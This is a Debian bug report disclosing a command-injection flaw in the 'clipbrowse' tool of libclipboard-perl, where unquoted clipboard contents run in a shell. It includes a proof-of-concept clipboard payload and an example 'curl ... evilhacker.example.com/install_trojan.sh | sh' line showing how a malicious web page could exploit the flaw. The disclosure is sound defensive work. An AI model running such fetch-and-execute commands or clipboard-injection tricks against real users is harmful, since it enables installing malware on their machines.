Package: libclipboard-perl Version: 0.27-1 Severity: important Dear Maintainer,
I was checking out the 'clipbrowse' command from the Debian package libclipboard-perl, while at the same time I was making notes on installation instructions for a different application, thereby having multiple lines in the clipboard buffer, including a line in the format "curl ... | sh" I ran the 'clipbrowse' command, not knowing the command usage exactly and expecting both an error and syntax example. * What was the outcome of this action? It opened a browser with the URL on the clipboard in the foreground (expected), and simultaneously starting the installation process for the application in the now hidden terminal/console. (not expected). * What outcome did you expect instead? I did not expect the clipbrowse command to run clipboard contents in a shell. Example: Copy the following 2 lines present into the clipboard, then run the 'clipbrowse' command: https://www.example.com echo echo p0wned | sh This results in the browser opening the requested URL in the foreground, while simultaneous running the specified command in the background. Testen on Debian 12, Perl 5.36.0-7+deb12u1, libclipboard-perl 0.27-1 This example might just print 'p0wned', but because you are copying this piece of text using a browser that understands JavaScript, and JavaScript can modify the clipboard contents, I could just as well have you execute "curl https://evilhacker.example.com/install_trojan.sh | sh" by changing the clipboard contents on an OnClipboard-event. This could be abused by including the 'clipbrowse' command as an instruction in an online tutorial, while having modified the users clipboard contents using JavaScript. I've raised the issue at the authors GitHub page ( https://github.com/shlomif/Clipboard/issues/11 ), but only today I've noticed that that the vulnerability might be with just the Debian package, not the source package. I believe the cause of this is by not enclosing a variable with doublequotes: The original sourcecode ( https://github.com/shlomif/Clipboard/blob/master/scripts/clipbrowse ) has doublequotes around the variable %s my $browser = $ENV{BROWSER} || 'chromium-browser "%s"'; And performs some string sanitizing in other lines. The Debian version does not have these quotes, making the string sanitizing ineffective: '/usr/bin/clipbrowse' contains the following line: my $browser = $ENV{BROWSER} || 'sensible-browser %s'; I have not checked if other packages that have been changed to use sensible- browser have the same issue. -- System Information: Debian Release: 12.4 APT prefers stable-updates APT policy: (500, 'stable-updates'), (500, 'stable-security'), (500, 'unstable'), (500, 'stable') Architecture: amd64 (x86_64) Foreign Architectures: i386 Kernel: Linux 6.1.0-14-amd64 (SMP w/4 CPU threads; PREEMPT) Kernel taint flags: TAINT_PROPRIETARY_MODULE, TAINT_OOT_MODULE, TAINT_UNSIGNED_MODULE Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8), LANGUAGE=en_US:en Shell: /bin/sh linked to /usr/bin/dash Init: systemd (via /run/systemd/system) LSM: AppArmor: enabled Versions of packages libclipboard-perl depends on: ii perl 5.36.0-7+deb12u1 ii xclip 0.13-2 Versions of packages libclipboard-perl recommends: ii libcgi-pm-perl 4.55-1 ii liburi-perl 5.17-1 ii sensible-utils 0.0.17+nmu1 libclipboard-perl suggests no packages. -- no debconf information

